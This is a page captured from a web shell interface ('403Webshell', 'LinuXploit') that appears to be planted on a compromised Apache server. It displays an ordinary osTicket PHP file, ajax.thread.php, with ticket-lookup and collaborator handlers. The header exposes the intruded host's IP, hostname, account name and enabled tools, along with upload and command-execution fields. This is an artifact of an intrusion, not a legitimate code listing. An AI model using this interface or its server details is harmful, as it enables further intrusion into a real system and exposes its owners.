- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.139.233.121
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/public_html/mesa/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/public_html/mesa/include/ajax.thread.php
<?php
/*********************************************************************
    ajax.thread.php

    AJAX interface for thread

    Peter Rotich <peter@osticket.com>
    Copyright (c)  2015 osTicket
    http://www.osticket.com

    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    See LICENSE.TXT for details.

    vim: expandtab sw=4 ts=4 sts=4:
**********************************************************************/

if(!defined('INCLUDE_DIR')) die('403');

include_once(INCLUDE_DIR.'class.ticket.php');
require_once(INCLUDE_DIR.'class.ajax.php');
require_once(INCLUDE_DIR.'class.note.php');
include_once INCLUDE_DIR . 'class.thread_actions.php';

class ThreadAjaxAPI extends AjaxController {

    function lookup() {
        global $thisstaff;

        if(!is_numeric($_REQUEST['q']))
            return self::lookupByEmail();


        $limit = isset($_REQUEST['limit']) ? (int) $_REQUEST['limit']:25;
        $tickets=array();

        $visibility = $thisstaff->getTicketsVisibility();
        $hits = Ticket::objects()
            ->filter(Q::any(array(
                'number__startswith' => $_REQUEST['q'],
            )))
            ->filter($visibility)
            ->values('number', 'user__emails__address')
            ->annotate(array('tickets' => SqlAggregate::COUNT('ticket_id')))
            ->order_by('-created')
            ->limit($limit);

        foreach ($hits as $T) {
            $tickets[] = array('id'=>$T['number'], 'value'=>$T['number'],
                'info'=>"{$T['number']} — {$T['user__emails__address']}",
                'matches'=>$_REQUEST['q']);
        }
        if (!$tickets)
            return self::lookupByEmail();

        return $this->json_encode($tickets);
    }


    function addRemoteCollaborator($tid, $type, $bk, $id) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, 'No such thread');
        elseif (!$bk || !$id)
            Http::response(422, 'Backend and user id required');
        elseif (!($backend = StaffAuthenticationBackend::getBackend($bk)))
            Http::response(404, 'User not found');

        $user_info = $backend->lookup($id);
        $form = UserForm::getUserForm()->getForm($user_info);
        $info = array();
        if (!$user_info)
            $info['error'] = __('Unable to find user in directory');

        return self::_addcollaborator($thread, null, $form, $type, $info);
    }

    //Collaborators utils
    function addCollaborator($tid, $type=null, $uid=0) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !is_subclass_of($object, 'Threadable')
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, __('No such thread'));

        $user = $uid? User::lookup($uid) : null;

        //If not a post then assume new collaborator form
        if(!$_POST)
            return self::_addcollaborator($thread, $user, null, $type);

        $user = $form = null;
        if (isset($_POST['id']) && $_POST['id']) { //Existing user/
            $user =  User::lookup($_POST['id']);
        } else { //We're creating a new user!
            $form = UserForm::getUserForm()->getForm($_POST);
            $user = User::fromForm($form);
        }

        $errors = $info = $vars = array();
        if ($user && ($c=$object->addCollaborator($user, $vars, $errors))) {
            $info = array('msg' => sprintf(__('%s added as a collaborator'),
                        Format::htmlchars($c->getName())));
            return self::_collaborators($thread, $info);
        }

        if ($errors && $errors['err']) {
            $info +=array('error' => $errors['err']);
        } else {
            $info +=array('error' =>__('Unable to add collaborator.').' '.__('Internal error occurred'));
        }

        return self::_addcollaborator($thread, $user, $form, $type, $info);
    }

    function updateCollaborator($tid, $cid) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(405, 'No such thread');


        if (!($c=Collaborator::lookup(array(
                            'id' => $cid,
                            'thread_id' => $thread->getId())))
                || !($user=$c->getUser()))
            Http::response(406, 'Unknown collaborator');

        $errors = array();
        if(!$user->updateInfo($_POST, $errors))
            return self::_collaborator($c ,$user->getForms($_POST), $errors);

        $info = array('msg' => sprintf('%s updated successfully',
                    Format::htmlchars($c->getName())));

        return self::_collaborators($thread, $info);
    }

    function viewCollaborator($tid, $cid) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, 'No such thread');


        if (!($collaborator=Collaborator::lookup(array(
                            'id' => $cid,
                            'thread_id' => $thread->getId()))))
            Http::response(404, 'Unknown collaborator');

        return self::_collaborator($collaborator);
    }

    function showCollaborators($tid) {
        global $thisstaff;

        if(!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, 'No such thread');

        if ($thread->getCollaborators())
            return self::_collaborators($thread);

        return self::_addcollaborator($thread);
    }

    function previewCollaborators($tid, $manage=true) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, 'No such thread');

        ob_start();
        include STAFFINC_DIR . 'templates/collaborators-preview.tmpl.php';
        $resp = ob_get_contents();
        ob_end_clean();

        return $resp;
    }

    static function _addcollaborator($thread, $user=null, $form=null, $type=null, $info=array()) {
        global $thisstaff;

        $info += array(
                    'title' => __('Add a collaborator'),
                    'action' => sprintf('#thread/%d/add-collaborator/%s',
                        $thread->getId(), $type),
                    'onselect' => sprintf('ajax.php/thread/%d/add-collaborator/%s/',
                        $thread->getId(), $type),
                    );

        ob_start();
        include STAFFINC_DIR . 'templates/user-lookup.tmpl.php';
        $resp = ob_get_contents();
        ob_end_clean();

        return $resp;
    }

    function updateCollaborators($tid) {
        global $thisstaff;

        if (!($thread=Thread::lookup($tid))
                || !($object=$thread->getObject())
                || !$object->checkStaffPerm($thisstaff))
            Http::response(404, 'No such thread');

        $errors = $info = array();
        $thread->updateCollaborators($_POST, $errors);

        if($errors && $errors['err'])
            $info +=array('error' => $errors['err']);

        return self::_collaborators($thread, $info);
    }



    static function _collaborator($collaborator, $form=null, $info=array()) {
        global $thisstaff;

        $info += array('action' => sprintf('#thread/%d/collaborators/%d',
                    $collaborator->thread_id, $collaborator->getId()));

        $user = $collaborator->getUser();

        ob_start();
        include(STAFFINC_DIR . 'templates/user.tmpl.php');
        $resp = ob_get_contents();
        ob_end_clean();

        return $resp;
    }

    static function _collaborators($thread, $info=array()) {

        ob_start();
        include(STAFFINC_DIR . 'templates/collaborators.tmpl.php');
        $resp = ob_get_contents();
        ob_end_clean();

        return $resp;
    }

    function triggerThreadAction($ticket_id, $thread_id, $action) {
        $thread = ThreadEntry::lookup($thread_id);
        if (!$thread)
            Http::response(404, 'No such ticket thread entry');
        if ($thread->getThread()->getObjectId() != $ticket_id)
            Http::response(404, 'No such ticket thread entry');

        $valid = false;
        foreach ($thread->getActions() as $group=>$list) {
            foreach ($list as $name=>$A) {
                if ($A->getId() == $action) {
                    $valid = true; break;
                }
            }
        }
        if (!$valid)
            Http::response(400, 'Not a valid action for this thread');

        $thread->triggerAction($action);
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit